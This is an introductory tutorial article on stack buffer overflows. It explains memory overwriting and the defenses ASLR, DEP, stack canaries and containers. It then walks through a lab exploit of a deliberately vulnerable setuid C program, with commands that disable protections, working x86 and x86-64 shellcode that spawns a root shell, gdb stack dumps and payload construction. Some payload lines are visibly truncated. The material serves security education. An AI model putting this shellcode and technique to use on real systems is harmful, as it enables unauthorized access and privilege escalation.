
Buffer overflow


A buffer overflow, or buffer overrun, is a software error triggered when a program does not adequately control the amount of data that is copied into a buffer. If this amount exceeds the buffer's preassigned capacity, the remaining bytes are stored in adjacent memory areas, overwriting their original content. This can be exploited by overwriting a function's return address to cause arbitrary code execution and allow access to a vulnerable system.

This is an introductory article to buffer overflows. Bleeding Life is an example of a project containing buffer overflows that bypass ASLR and DEP for Windows 7.
Understanding buffer overflows requires a basic understanding of assembly and machine code.

Special thanks to Teknical for his contributions to this article.



A computer receives input, recalls what to do with the input, and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and execute it because it doesn't know any better. This is what happens during a buffer overflow attack.

The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. If a user sends in 300 pieces of data or mail, there are two scenarios: 1. A secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail". 2. An insecure program would simply take all the data into boxes 1-300.

In the insecure scenario, when the computer remembers what to do, it lands on P.O. box 201. If the user were an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous vulnerability.
Notice: Though it is a dying attack vector, the buffer overflow is still very prominent today.

In reality, there is a return address that the computer uses to remember where its instructions are. If an attacker filled P.O. boxes 1-201, box 201 contained the return address, and the attacker changed that return address to point at P.O. box 1, the computer would execute the data instead of just keeping it in memory. This means that the attacker has to know enough about the system to know what address the malicious instructions will end up at; otherwise the attacker will not know the correct return address to put into P.O. box 201. In short, the attacker needs precise aim, or the attack will be unsuccessful.
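
The secure scenario from the analogy above can be sketched in C. This is only a minimal illustration, not code from any real program: the names `post_office`, `USER_BOXES` and `accept_mail` are hypothetical, and each P.O. box is modeled as a single byte.

```c
#include <stddef.h>
#include <string.h>

#define TOTAL_BOXES 500   /* the whole post office */
#define USER_BOXES  200   /* boxes 1-200 are reserved for user data */

/* One byte per P.O. box; boxes 201-500 stand in for the "instructions". */
static unsigned char post_office[TOTAL_BOXES];

/*
 * Secure intake: refuse the delivery outright if it does not fit in the
 * user boxes. Returns 0 on success, -1 if the mail was rejected.
 */
int accept_mail(const unsigned char *mail, size_t count)
{
    if (mail == NULL || count > USER_BOXES) {
        return -1;                      /* "I'm not taking any more mail" */
    }
    memcpy(post_office, mail, count);   /* never touches boxes 201-500 */
    return 0;
}
```

With this check in place, a delivery of 300 pieces is rejected as a whole, so nothing ever reaches box 201.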

Protip: Debuggers such as IDA Pro, kgdb, gdb, and ollydbg are very helpful for finding the correct return pointer for the shellcode.



Multiple defenses have been incorporated into runtime environments in an attempt to fight buffer overflows and prevent them from taking place. One of the most recent defense mechanisms is ASLR, which stands for Address Space Layout Randomization. With ASLR, the address space a program lives in changes every time the computer reboots and every time the program runs. In other words, following the mailbox analogy, the return address will never be in the same mailbox. The point is to prevent an attacker from performing a buffer overflow exploit, because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which trick the error handler for programs and allow an attacker to aim the attack correctly without having to know a return address. One key weakness of ASLR is that certain operating systems (such as Windows 7) dynamically disable it for non-compatible libraries.


Another defense mechanism that has been implemented is DEP, which stands for Data Execution Prevention. DEP marks data regions such as the stack as non-executable, so that even if the return address is changed to point into the same memory space as the data, the machine code placed there (the code that buffer overflow payloads are crafted in) will not run. Return-oriented programming (ROP) is used to defeat modern DEP.

To get past additional input filters, attackers have developed polymorphic, multi-architecture, alphanumeric and ASCII-only shellcode. To many filters, ASCII and polymorphic ASCII code looks like normal user input rather than malicious binary or machine code.


An even further defense mechanism is called a container, which is another layer of Data Execution Prevention. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the application from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or CSA. Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.
Notice: As attacks become more and more sophisticated, so do hardware and software prevention mechanisms.

Bypassing protections

With CSA, ASLR, and operating-system-supplied DEP in place, successfully performing a buffer overflow exploit against a system can be extremely difficult. Any attacker who makes it to the point where CSA catches the attempt is already very advanced. To successfully subvert ASLR, DEP and containers, one must use polymorphic ASCII shellcode and return-oriented programming. Return-oriented programming is used to evade the NX and XD bits, a type of hardware DEP implemented directly in processors. Bypassing modern host-level buffer overflow defenses requires machine code that modifies itself, looks like standard user input, and has all of its own functions built into its own code in a return-oriented fashion. The return address must always be supplied as raw bytes rather than printable text, so it will usually show up as odd characters such as squares or strange symbols. In a real buffer overflow exploit attempt, the IDS or HIDS context buffer will show four such squares or symbols at the end on a 32-bit system, and eight on a 64-bit system.

Learning to count in hexadecimal and to do bitwise math will tell you more about these sizes.

Maximum effectiveness

Many times firewall rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called Second Stage Shellcode to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent firewalls and prevent a firewall from blocking a connection.

Buffer overflows can be used remotely to gain partial or total system access, or they can be used locally to escalate privileges inside the operating system in order to gain system or root level access. The real threat posed by buffer overflows is the "zero-day attack": an attack using a vulnerability, such as a buffer overflow, that the security world has never seen before. Zero-day or 0day attacks are the most devastating to the security industry, giving rise to worms and viruses and sometimes causing hundreds of thousands of systems to be compromised in a single day.


Buffer overflows exist because of a combination of insecure language compilers, insecure programming, and CPU architectures that keep a function call's return address on the stack. A programmer should be able to check input to the data segment with relative ease. Often, however, coders are ignorant of the problem or overlook the flaw, and sometimes a disgruntled employee might even code the vulnerability into an application for personal gain after the application goes to production.
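
As one illustration of the kind of input check meant here, the sketch below copies a string into a fixed-size buffer only when it fits. The helper name `copy_checked` is hypothetical, and this is one possible approach under that assumption rather than the only way to do it.

```c
#include <stddef.h>
#include <string.h>

/*
 * Copy src into dst only if it fits, including the terminating NUL.
 * Returns 0 on success, -1 if src is missing or too long; on failure
 * dst is left as an empty string.
 */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || dst_size == 0) {
        return -1;
    }
    dst[0] = '\0';
    if (src == NULL) {
        return -1;
    }
    size_t len = strlen(src);
    if (len >= dst_size) {
        return -1;              /* would overflow: reject instead of truncating */
    }
    memcpy(dst, src, len + 1);  /* len + 1 copies the NUL as well */
    return 0;
}
```

Rejecting oversized input, rather than silently truncating it, keeps the failure visible to the caller; whether truncation would be acceptable depends on the application.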

Protip: Bench-marking and pen-testing software in an as-you-develop fashion for proper quality assurance and control can help prevent attacks from a malicious insider.


Notice: This example is for a 32 bit Linux operating system and the steps below may vary per your distribution and installation.

Disabling ASLR

The first step is to disable ASLR. This allows the featured proof of concept to be successful. There are other methods of bypassing ASLR, but they will not be covered here.

 teknical@teknical-vm:~$ sudo -s
 [sudo] password for teknical: 
 root@teknical-vm:~# echo 0 > /proc/sys/kernel/randomize_va_space
 root@teknical-vm:~# exit
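
Before and after changing the setting, it can be useful to confirm what the kernel currently reports. The sketch below reads the same procfs file written to above; the function name `read_aslr_setting` is hypothetical. On Linux this file holds 0 when randomization is disabled, and 1 or 2 when it is enabled.

```c
#include <stdio.h>

/*
 * Read an integer setting from a procfs-style file.
 * Returns the value on success, or -1 if the file cannot be read
 * or does not start with an integer.
 */
int read_aslr_setting(const char *path)
{
    FILE *f = fopen(path, "r");
    if (f == NULL) {
        return -1;
    }
    int value = -1;
    if (fscanf(f, "%d", &value) != 1) {
        value = -1;
    }
    fclose(f);
    return value;
}
```

Calling `read_aslr_setting("/proc/sys/kernel/randomize_va_space")` after the commands above should return 0; reading the file does not require root.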

Test application

The test application is below. Note that there is a fixed-size buffer of 100 bytes allocated on the stack. This is what will be overflowed. Calling strcpy on unchecked input is a common mistake; avoiding it is recommended to prevent applications from being exploited.


  #include <stdlib.h>
  #include <stdio.h>
  #include <string.h>
  int main(int argc, char *argv[]){
  	char buffer[100];           /* fixed-size stack buffer */
  	strcpy(buffer,  argv[1]);   /* deliberately unchecked copy: this is the bug */
  	return 0;
  }


For compilation, use the -g option of gcc to include debugging symbols in the binary, which makes debugging easier.

 teknical@teknical-vm:~$ gcc -g bof.c -o bof

Following compilation, the vulnerability can then be triggered. This example has a buffer of 100 bytes, so 104 bytes is a good first test and will result in an overflow. Ruby is used to build the 104-byte string dynamically; perl is another option.

Potential compile-time protections

 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 *** stack smashing detected ***: ./bof terminated

Teknical says
By default, newer versions of gcc and other modern compilers add stack protection to code at compile time, which is what produces the message above.
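
The "stack smashing detected" message comes from a guard value, often called a canary, that the compiler places between local buffers and the saved return data and checks before the function returns. The sketch below only simulates that idea inside an ordinary byte array so that it stays well-defined C. The layout, the names `simulate_copy` and `CANARY`, and the guard bytes are illustrative assumptions, not gcc's actual implementation.

```c
#include <stddef.h>
#include <string.h>

#define BUF_SIZE    100
#define CANARY_SIZE 4
#define FRAME_SIZE  (BUF_SIZE + CANARY_SIZE)

/* Arbitrary guard bytes for the simulation; real canaries are randomized. */
static const unsigned char CANARY[CANARY_SIZE] = { 0xde, 0xc0, 0xad, 0x0b };

/*
 * Copy n bytes of input into a simulated frame laid out as
 * [ buffer (100 bytes) | canary (4 bytes) ] and report whether the
 * canary survived. Returns 1 if intact, 0 if "stack smashing" is detected.
 * The copy is clamped to FRAME_SIZE so the simulation itself never
 * writes outside its array.
 */
int simulate_copy(const unsigned char *input, size_t n)
{
    unsigned char frame[FRAME_SIZE];

    memset(frame, 0, BUF_SIZE);
    memcpy(frame + BUF_SIZE, CANARY, CANARY_SIZE);   /* prologue: plant canary */

    if (n > FRAME_SIZE) {
        n = FRAME_SIZE;
    }
    memcpy(frame, input, n);                         /* the unchecked copy */

    /* epilogue: compare the canary before "returning" */
    return memcmp(frame + BUF_SIZE, CANARY, CANARY_SIZE) == 0;
}
```

In this model, 100 bytes of input leave the canary intact, while 104 bytes of `\x90` overwrite it and the check fails, mirroring the behavior seen above.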
Solution for test application

The test application must be compiled without this protection. The stack protection is removed by passing the -fno-stack-protector option to gcc.

 teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof


A setuid binary is used for this example so that the shell obtained is a root shell. Set up the bof binary as setuid root as shown below:

 teknical@teknical-vm:~$ sudo chown root:root ./bof
 teknical@teknical-vm:~$ sudo chmod 4755 ./bof

On x86

Following the compilation of the application, the vulnerability can be triggered once again. As stated earlier, 104 bytes are used and this is increased until the vulnerability is triggered.

 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*108'`
 teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*112'`
 Segmentation fault

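Note that it took 112 bytes to fully overwrite the saved ebp of the running application; the terminating null byte that strcpy appends then lands on the first byte of the return address, which is consistent with the crash. The system is now prepared for exploitation attempts. Note that 116 bytes are required to overwrite the return address on the stack.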

Notice: The extra bytes beyond the 100-byte buffer hold other saved values, such as saved registers and alignment padding. These are overwritten as well.

On x86-64

This number will vary on x86-64...

 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 100'`
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 110'`
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 120'`
 Segmentation fault
 xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 119'`

On x86-64 it takes 120 bytes to trigger a segfault. Another important difference is that the return address is 8 bytes wide and is loaded into the 8-byte rip register, not the 4-byte eip register.

Disabling DEP

DEP is another protection scheme, which prevents code on the stack from being executed. The 'execstack' utility is used to check whether the binary is marked as having an executable stack, and to set that marking.

Xochipilli says
Gcc's `-z execstack' parameter can be used to set the stack as executable at compile time

The -q option will query the current status.

 teknical@teknical-vm:~$ sudo execstack -q bof
 - bof

Notice the -, which means that the application will NOT have an executable stack. This will prevent successful exploitation.

The -s option is used to set the binary to allow execution on the stack.

 teknical@teknical-vm:~$ sudo execstack -s bof

If queried again, an X will appear in its place, which means that the stack is now executable.

 teknical@teknical-vm:~$ sudo execstack -q bof
 X bof


Notice: gdb is required for the following sections; it can be installed using the package manager.

The next step is to start up gdb and begin debugging.

Shellcode analysis

Shellcode is machine code, in flat binary form, that is executed during exploitation of a buffer overflow.

On x86

The following will be used as the argument to the test application:

 `ruby -e 'print "\x90"*60,
 \xff\xff/bin/sh", "A"*7,

There are a few things to note when examining the argument above.
Notice: The backticks perform bash command substitution, as described in the bash book.
The shellcode used is 45 bytes long. It is a setuid() + /bin/sh shellcode.

From the earlier test it is known that 112 bytes are required to overwrite ebp, and another 4 to overwrite the return address. The shellcode is preceded by 60 NOPs: 60 + 45 = 105. Another 7 bytes are therefore needed to reach 112 and finish overwriting ebp. 0x41 ('A') is recommended for this padding because it is easy to recognize when debugging. The final 4 bytes hold the return address. 60 + 45 + 7 + 4 = 116, which is the number of bytes needed to overwrite the return address and successfully exploit the target.

On x86-64

The following shellcode is used to spawn a shell:

 "\x48\x31\xd2"                                  // xor    %rdx, %rdx
 "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov    $0x68732f6e69622f2f, %rbx
 "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
 "\x53"                                          // push   %rbx
 "\x48\x89\xe7"                                  // mov    %rsp, %rdi
 "\x50"                                          // push   %rax
 "\x57"                                          // push   %rdi
 "\x48\x89\xe6"                                  // mov    %rsp, %rsi
 "\xb0\x3b"                                      // mov    $0x3b, %al
 "\x0f\x05";                                     // syscall



This shellcode is 30 bytes long. 120 bytes are required to reach the return address, plus 8 bytes for the return address itself. To start, use a 60-byte nopsled + 30-byte shellcode + 30 bytes of padding + 8-byte return address, totaling 128 bytes.
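
The byte counts for both architectures can be double-checked with a few lines of C. The struct and function names below are hypothetical; the numbers are the ones used in this article.

```c
#include <stddef.h>

/* Sizes, in bytes, of each part of the argument described in the text. */
struct payload_layout {
    size_t nop_sled;        /* leading \x90 bytes */
    size_t shellcode;       /* machine code */
    size_t padding;         /* 'A' filler up to the return address */
    size_t return_address;  /* 4 bytes on x86, 8 bytes on x86-64 */
};

/* Values taken from the x86 and x86-64 walkthroughs. */
static const struct payload_layout X86_LAYOUT    = { 60, 45,  7, 4 };
static const struct payload_layout X86_64_LAYOUT = { 60, 30, 30, 8 };

/* Offset at which the return address starts within the argument. */
size_t return_address_offset(const struct payload_layout *p)
{
    return p->nop_sled + p->shellcode + p->padding;
}

/* Total length of the argument. */
size_t total_length(const struct payload_layout *p)
{
    return return_address_offset(p) + p->return_address;
}
```

For `X86_LAYOUT` these functions give 112 and 116; for `X86_64_LAYOUT` they give 120 and 128, matching the figures in the text.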

Finding the return address

  • Starting gdb
 teknical@teknical-vm:~$ gdb -q ./bof
 Reading symbols from /home/teknical/bof...done.
  • Setting a breakpoint inside of the "main" function
 (gdb) break main
 Breakpoint 1 at 0x80483ed: file bof.c, line 7.
  • Starting the application with the command line as discussed above.
On x86
 (gdb) r `ruby -e 'print "\x90"*60, "[insert our shellcode here]", "A"*7, "\x41\x41\x41\x41"'`
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, 
 \x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
 Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
 7		strcpy(buffer,  argv[1]);
Teknical says
With execution stopped in the main function, let's examine the stack. It is known that at least 116 bytes on the stack are required; 200 four-byte words are dumped to make sure everything of interest is shown. Another thing to look for is the address of the shellcode on the stack.
 (gdb) x/200x $esp
 0xbffff340:	0x00119222	0xbffff3e4	0x080481f4	0xbffff3d8
 0xbffff350:	0x0012ca54	0x00000000	0x0012fb48	0x00000001
 0xbffff360:	0x00000000	0x00000001	0x0012c8f8	0x00293ff4
 0xbffff370:	0x00242d19	0x0016d2a5	0xbffff388	0x001549d5
 0xbffff380:	0x00293ff4	0x08049ff4	0xbffff398	0x080482e8
 0xbffff390:	0x0011e030	0x08049ff4	0xbffff3c8	0x08048439
 0xbffff3a0:	0x00294324	0x00293ff4	0x08048420	0xbffff3c8
 0xbffff3b0:	0x0016d4a5	0x0011e030	0x0804842b	0x00293ff4
 0xbffff3c0:	0x08048420	0x00000000	0xbffff448	0x00154bd6
 0xbffff3d0:	0x00000002	0xbffff474	0xbffff480	0x0012f858
 0xbffff3e0:	0xbffff430	0xffffffff	0x0012bff4	0x08048245
 0xbffff3f0:	0x00000001	0xbffff430	0x0011d626	0x0012cab0
 0xbffff400:	0x0012fb48	0x00293ff4	0x00000000	0x00000000
 0xbffff410:	0xbffff448	0xee66f487	0x3b1663f8	0x00000000
 0xbffff420:	0x00000000	0x00000000	0x00000002	0x08048330
 0xbffff430:	0x00000000	0x00123230	0x00154afb	0x0012bff4
 0xbffff440:	0x00000002	0x08048330	0x00000000	0x08048351
 0xbffff450:	0x080483e4	0x00000002	0xbffff474	0x08048420
 0xbffff460:	0x08048410	0x0011e030	0xbffff46c	0x0012c8f8
 0xbffff470:	0x00000002	0xbffff5e4	0xbffff5f7	0x00000000
 0xbffff480:	0xbffff66c	0xbffff690	0xbffff6a3	0xbffff6b3
 0xbffff490:	0xbffff6be	0xbffff70f	0xbffff721	0xbffff74b
 0xbffff4a0:	0xbffff76b	0xbffff779	0xbffffc1a	0xbffffc40
 0xbffff4b0:	0xbffffc52	0xbffffcae	0xbffffce0	0xbffffceb
 0xbffff4c0:	0xbffffd17	0xbffffd64	0xbffffd7a	0xbffffd89
 0xbffff4d0:	0xbffffd9c	0xbffffdb3	0xbffffdca	0xbffffdda
 0xbffff4e0:	0xbffffdee	0xbffffe23	0xbffffe2c	0xbffffe3d
 0xbffff4f0:	0xbffffe4f	0xbffffe63	0xbffffe6b	0xbffffe97
 0xbffff500:	0xbffffea8	0xbfffff0a	0xbfffff47	0xbfffff67
 0xbffff510:	0xbfffff74	0xbfffff96	0xbfffffaf	0x00000000
 0xbffff520:	0x00000020	0x0012d420	0x00000021	0x0012d000
 0xbffff530:	0x00000010	0x078bf3ff	0x00000006	0x00001000
 0xbffff540:	0x00000011	0x00000064	0x00000003	0x08048034
 0xbffff550:	0x00000004	0x00000020	0x00000005	0x00000008
 0xbffff560:	0x00000007	0x00110000	0x00000008	0x00000000
 0xbffff570:	0x00000009	0x08048330	0x0000000b	0x000003e8
 0xbffff580:	0x0000000c	0x000003e8	0x0000000d	0x000003e8
 0xbffff590:	0x0000000e	0x000003e8	0x00000017	0x00000001
 0xbffff5a0:	0x00000019	0xbffff5cb	0x0000001f	0xbfffffe9
 0xbffff5b0:	0x0000000f	0xbffff5db	0x00000000	0x00000000
 0xbffff5c0:	0x00000000	0x00000000	0x85000000	0xaaec0f53
 0xbffff5d0:	0xb8fc08c0	0xd3d76e6a	0x693bf638	0x00363836
 0xbffff5e0:	0x00000000	0x6d6f682f	0x65742f65	0x63696e6b
 0xbffff5f0:	0x622f6c61	0x9000666f	0x90909090	0x90909090
 0xbffff600:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff610:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff620:	0x90909090	0x90909090	0x90909090	0x90909090
 0xbffff630:	0xeb909090	0x76895e1f	0x88c03108	0x46890746
 0xbffff640:	0x890bb00c	0x084e8df3	0xcd0c568d	0x89db3180
 0xbffff650:	0x80cd40d8	0xffffdce8	0x69622fff	0x68732f6e

The next step is to find the shellcode on the stack. The easiest thing to do here is to look for the NOPs. The address of the NOPs is required so this can be used as the return address on the stack. This will cause execution to resume with the shell code once the function returns.

Protip: Advanced attacks include ascii shellcode for maximum evasion.

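Note the NOPs above, which fill whole words starting at 0xbffff5f8 (the first NOP byte itself sits at 0xbffff5f7). 0xbffff610 will be used since it lies inside the NOP sled and is a cleaner address. Written in little-endian byte order, this is "\x10\xf6\xff\xbf".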

On x86-64
 (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68
 \x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x41\x41
 Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb
 \x0f\x05", "A" x 30, "\x41\x41\x41\x41\x41\x41\x41\x41"'`
 (gdb) x/400x $rsp
Xochipilli says
I truncated this cause it was huge
 0x7fffffffe510:	0x00000064	0x00000000	0x00000003	0x00000000
 0x7fffffffe520:	0x00400040	0x00000000	0x00000004	0x00000000
 0x7fffffffe530:	0x00000038	0x00000000	0x00000005	0x00000000
 0x7fffffffe540:	0x00000008	0x00000000	0x00000007	0x00000000
 0x7fffffffe550:	0xf7ddd000	0x00007fff	0x00000008	0x00000000
 0x7fffffffe560:	0x00000000	0x00000000	0x00000009	0x00000000
 0x7fffffffe570:	0x00400400	0x00000000	0x0000000b	0x00000000
 0x7fffffffe580:	0x000003e8	0x00000000	0x0000000c	0x00000000
 0x7fffffffe590:	0x000003e8	0x00000000	0x0000000d	0x00000000
 0x7fffffffe5a0:	0x000003e8	0x00000000	0x0000000e	0x00000000
 0x7fffffffe5b0:	0x000003e8	0x00000000	0x00000017	0x00000000
 0x7fffffffe5c0:	0x00000000	0x00000000	0x00000019	0x00000000
 0x7fffffffe5d0:	0xffffe609	0x00007fff	0x0000001f	0x00000000
 0x7fffffffe5e0:	0xffffefe1	0x00007fff	0x0000000f	0x00000000
 0x7fffffffe5f0:	0xffffe619	0x00007fff	0x00000000	0x00000000
 0x7fffffffe600:	0x00000000	0x00000000	0xcc45c200	0xf80e704b
 0x7fffffffe610:	0xd5660936	0xff5959b5	0x36387878	0x0034365f
 0x7fffffffe620:	0x00000000	0x00000000	0x6d6f682f	0x6f782f65
 0x7fffffffe630:	0x6c69662f	0x622f7a65	0x622f666f	0x9000666f
 0x7fffffffe640:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe650:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe660:	0x90909090	0x90909090	0x90909090	0x90909090
 0x7fffffffe670:	0x90909090	0x90909090	0x48909090	0xbb48d231

Note that the nopsled begins at about 0x7fffffffe640, so this address is used as the return address that will be loaded into rip. Converted to little endian and formatted appropriately, this is \x40\xe6\xff\xff\xff\x7f\x00\x00.
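
The byte reordering for both addresses can be checked mechanically. The helper below is a hypothetical sketch that writes an address least-significant byte first, which is the order x86 and x86-64 use in memory.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Write the low `width` bytes of `addr` into `out`, least significant
 * byte first (little-endian). `width` is 4 for x86 and 8 for x86-64;
 * anything above 8 is ignored because the address only has 8 bytes.
 */
void pack_little_endian(uint64_t addr, unsigned char *out, size_t width)
{
    for (size_t i = 0; i < width && i < sizeof addr; i++) {
        out[i] = (unsigned char)(addr >> (8 * i));
    }
}
```

Packing 0xbffff610 with a width of 4 yields the bytes 10 f6 ff bf, and packing 0x7fffffffe640 with a width of 8 yields 40 e6 ff ff ff 7f 00 00, matching the strings used in this article.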


After clearing the breakpoint, restart the application with the same command-line argument, but replace the "\x41\x41\x41\x41" at the end of the argument with the return address "\x10\xf6\xff\xbf" (on x86-64, replace the eight \x41 bytes with "\x40\xe6\xff\xff\xff\x7f\x00\x00").

 (gdb) clear main
 Deleted breakpoint 1 
On x86
 (gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46
 \xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
 The program being debugged has been started already.
 Start it from the beginning? (y or n) y
 Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60,"\xeb\x1f\x5e
 "A"*7, "\x10\xf6\xff\xbf"'`
 process 2262 is executing new program: /bin/sh
 # whoami
On x86-64
 (gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e
 \x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31
 \x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
 process 27319 is executing new program: /bin/dash
 $ whoami
Xochipilli says
The x86-64 shellcode used in this example does not call setuid() so it will execute at the privileges of the exploited application

YAY! Successful exploitation has occurred.

Protip: If for some reason the exploitation was not successful, you could attempt a different return address.

Buffer overflow is part of a series on exploitation.